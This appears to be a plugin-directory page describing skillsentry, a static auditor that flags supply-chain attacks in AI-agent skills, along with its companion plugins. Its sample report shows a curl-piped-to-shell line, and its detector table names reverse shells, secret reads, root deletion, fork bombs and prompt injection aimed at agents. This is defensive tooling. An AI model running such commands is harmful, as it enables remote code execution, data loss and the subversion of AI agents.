An OPT-IN 'supersize' extension that adds Semgrep static analysis on top of skillsentry's verdict for deeper, language-aware SAST. A SEPARATE product with its own trust statement: it shells out to an external `semgrep` binary if installed (degrading gracefully with install guidance when absent) and is NEVER imported into the skillsentry core, so the auditor's zero-dependency, never-executing, deterministic guarantees remain unqualified. Off by default.
Based on adoption, maintenance, documentation, and repository signals. Not a security audit or endorsement.
Point it at a Claude Code skill or plugin; it tells you, with receipts, whether it's safe to trust — without ever executing what it scans.
npx skillsentry <git-url | local-dir>
Agent skills are executable markdown + scripts that run with your shell's full authority, and the bar
to publish one is a SKILL.md and an account. No mandatory review, no signing, no sandbox by default. That
gap is already being exploited — the ClawHub campaign shipped 30+ malicious skills; Snyk's ToxicSkills
research found prompt injection in more than a third of the skills it tested.
There wasn't an obvious one-line way to look at a skill before installing it, so we built one. That's the whole motivation: a checker that should exist. It's MIT-licensed and free because a tool for deciding whether something is safe to run shouldn't put that decision behind a paywall — not as a selling point, just as the sensible default.
You give it a target; it clones (read-only, hooks disabled) or reads a local folder, enumerates the files, runs a ruleset over them, and aggregates the findings into one verdict. Nothing in the skill is ever executed.
$ npx skillsentry github.com/acme/cool-skill
⛔ BLOCK (1 high, 2 medium)
high dangerous-bash/curl-pipe-to-shell hooks/post.sh:12 curl -s $URL | sh
→ remote code piped to a shell; classic install-time RCE
→ OWASP ASI04 · MITRE ATLAS AML.T0011
verdict: BLOCK · report → ./skillsentry.{md,json} · exit 1
The guide explains every stage and every detector. The short version is below.
Detection is layered into tiers, each finding tagged to a recognised framework (OWASP Agentic/MCP/LLM Top 10 + MITRE ATLAS) so it fits how security teams already work:
| Detector | Tier | Catches |
|---|---|---|
dangerous-bash | T0 | curl … | sh, reverse shells, secret reads, base64-piped payloads — install-time RCE |
prompt-injection | T0 | hidden/coercive instructions, zero-width unicode, homoglyphs, encoded & ANSI "line-jumping" payloads |
over-broad-perms | T0 | "Bash(*)" allow-all, network-reaching hooks, MCP servers fusing filesystem + network + secrets |
committed-secrets | T0 | API keys, tokens, private keys committed into the skill |
tool-description-poisoning | T0 | malicious instructions hidden in tool/skill descriptions the model reads but you don't |
resource-exhaustion | T0 | destructive rm -rf of a root path, fork bombs, and raw-disk wipes (dd/mkfs/shred) — denial of service |
audit-evasion | T0 | clearing shell history or tampering with /var/log to erase the trail |
dataflow-taint | T1 | multi-line / cross-file shell payloads where a tainted source reaches a dangerous sink |
…plus a temporal pass (not a ruleset detector): version-drift (T3) — the rug-pull, a skill that
gained dangerous capability after you approved it (raised by diffing against a .skillsentry.lock
baseline, not by a per-file rule).
What it doesn't catch matters too — it's a pre-run static check, not a sandbox or a proof of safety. The threat model is explicit about the limits.
threat-stack platformnpx skillsentry is the trust anchor, but the repo also ships as a Claude Code plugin marketplace
called threat-stack (AUDIT ▸ MODEL ▸ EXTEND):
skillsentry (AUDIT) — the pure auditor as an in-editor command (/skillsentry:audit), running
the same deterministic CLI bundled in-repo (no npm install needed).threat-modeler (MODEL) — maps the probe set onto STRIDE + agentic axes, runs the
Elevation-of-Privilege gap ritual, and proposes new rules via PR (never self-merge).supersize-semgrep (EXTEND) — an opt-in, separate-trust-model Semgrep SAST extension that never
touches the auditor's zero-dependency core.Own this plugin?
Verify ownership to unlock analytics, metadata editing, and a verified badge. GitHub access is read-only (username + org membership).
Sign in to claimOwn this plugin?
Verify ownership to unlock analytics, metadata editing, and a verified badge. GitHub access is read-only (username + org membership).
Sign in to claimnpx claudepluginhub agentic-underground/skillsentry --plugin supersize-semgrepAudit an AI-agent skill or plugin for supply-chain attacks BEFORE it runs. A thin in-editor wrapper over the pure, never-executing, zero-dependency skillsentry CLI (shipped self-contained in cli/). /skillsentry:audit <target> runs the deterministic auditor over this repo or ANY other repo you are working on and renders a PASS / REVIEW / BLOCK verdict whose findings are tagged to OWASP, MITRE ATLAS and STRIDE. Detection stays inside the deterministic CLI — the plugin never reads-and-judges target files in the agent context, so auditing a hostile repo is safe. The trust anchor of the threat-stack platform.
The agentic threat-intelligence layer of the threat-stack platform. Maps skillsentry's probe set onto STRIDE's six portals plus two EXTRA agentic axes (temporal, cognitive), deals the Elevation-of-Privilege 'threat-modelling poker' deck against the probes to surface ABSENT/THIN cells, and writes a gap analysis (doc/threat-model/). Under the self-improvement covenant it drafts new deterministic RuleSpec data and OPENS A PR — it never decides a verdict and never ships a rule directly; the deterministic test suite and a human are the acceptance gate. STRIDE is the organising lens here — one intelligence source feeding the covenant, not an authority that bypasses the gates.
The front door of the threat-stack platform. Greets whoever opens the repo, explains the value flow (AUDIT ▸ MODEL ▸ EXTEND), lists only the installed plugins and the next command to run, and consolidates each plugin's readiness into one view. A thin orchestrator that delegates to the specialists (skillsentry, threat-modeler, supersize-*) by capability and never re-implements them.
Comprehensive UI/UX design plugin for mobile (iOS, Android, React Native) and web applications with design systems, accessibility, and modern patterns
Standalone image generation plugin using Nano Banana MCP server. Generates and edits images, icons, diagrams, patterns, and visual assets via Gemini image models. No Gemini CLI dependency required.
Multi-model consensus engine integrating OpenAI Codex CLI, Gemini CLI, and Claude CLI for collaborative code review and problem-solving.
Write feature specs, plan roadmaps, and synthesize user research faster. Keep stakeholders updated and stay ahead of the competitive landscape.
Unified status line for Claude Code with multi-CLI (Claude, Codex, Gemini, z.ai) usage monitoring, context, rate limits, and cost tracking